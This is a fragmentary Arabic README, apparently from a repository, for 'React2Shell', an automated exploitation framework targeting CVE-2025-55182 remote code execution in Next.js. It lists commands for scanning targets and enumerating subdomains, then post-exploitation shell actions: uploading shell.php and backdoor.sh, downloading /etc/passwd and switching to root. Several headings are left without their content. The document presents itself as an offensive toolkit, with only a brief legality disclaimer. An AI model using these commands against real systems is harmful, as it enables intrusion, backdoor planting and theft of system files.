
إطار استغلال آلي لـ CVE-2025-55182 (Next.js RCE) مع تعداد النطاقات الفرعية، وفحص الثغرات، وتوليد الحمولات، وقشرة تفاعلية عن بُعد مع عمليات الملفات.
إطار عمل استغلال متقدم لـ CVE-2025-55182 (تنفيذ كود عن بُعد في Next.js)
المؤلف: opsecramdan
React2Shell هو إطار عمل استغلال لتحديد واستغلال الثغرة CVE-2025-55182 في التطبيقات المبنية على Next.js.
تم تصميم هذه الأداة كـ مجموعة أدوات هجومية شاملة تتضمن:
تستغل هذه الثغرة الآلية الداخلية لـ Next.js بالطريقة التالية:
/login?a=)//api/api/auth/_next/admin/dashboardsudo -iتثبيت التبعيات: pip install requests dnspython
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git
cd react2shell-cve-2025-55182
python3 react2shell.py
python3 react2shell.py -u https://target.com
بدون بروتوكول:
python3 react2shell.py -u target.com
python3 react2shell.py -f targets.txt
مثال لمحتوى targets.txt:
https://target1.com http://target2.com:3000 target3.com
python3 react2shell.py -d example.com
التدفق:
python3 react2shell.py -d example.com -w wordlist.txt
python3 react2shell.py -d example.com --debug
بعد نجاح الاستغلال، ستحصل على وصول إلى الصدفة.
whoami
id
uname -a
pwd
ls -lah
.upload shell.php /tmp/shell.php
.download /etc/passwd
.create /tmp/test.txt
python3 react2shell.py -d example.com
whoami
.upload backdoor.sh /tmp/backdoor.sh
ستقوم الأداة بتوليد:
إذا تم استغلالها بنجاح:
صُممت هذه الأداة فقط لـ:
ممنوع استخدامها في الأنشطة غير القانونية.
يوضح هذا المشروع:
| الأمر | الوصف |
|---|
| .root | تبديل وضع الجذر |
| .upload | رفع ملف إلى الهدف |
| .download | تنزيل ملف من الهدف |
| .create | إنشاء ملف في الهدف |
| .save | حفظ الإخراج في ملف محلي |
| .exit | الخروج من الصدفة |